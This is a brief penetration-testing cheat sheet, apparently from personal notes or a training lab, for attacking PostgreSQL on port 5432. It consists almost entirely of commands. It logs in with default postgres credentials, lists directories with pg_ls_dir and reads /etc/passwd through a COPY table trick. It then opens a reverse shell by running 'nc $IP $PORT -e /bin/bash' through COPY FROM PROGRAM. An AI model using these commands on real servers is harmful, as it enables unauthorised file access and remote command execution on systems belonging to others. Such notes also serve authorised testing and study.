# Port 5432 - Postgres

```
psql -h $IP -p 5432 -U postgres -W postgres
```

```
\list, \c postgres, \d
```

```
select pg_ls_dir('/')
```

**Read a file:**

```
create table demo (t text); copy demo from '/etc/passwd'; select * from demo;
```

 

 

**Shell:**

* Check Nibbles, splodge for RCE
* Switch to db app:

```
\c app
drop table if exists cmd_exec;
create table cmd_exec(cmd_output text);
```

* Setup nc listener

```
COPY cmd_exec FROM PROGRAM 'nc $IP $PORT -e /bin/bash';
```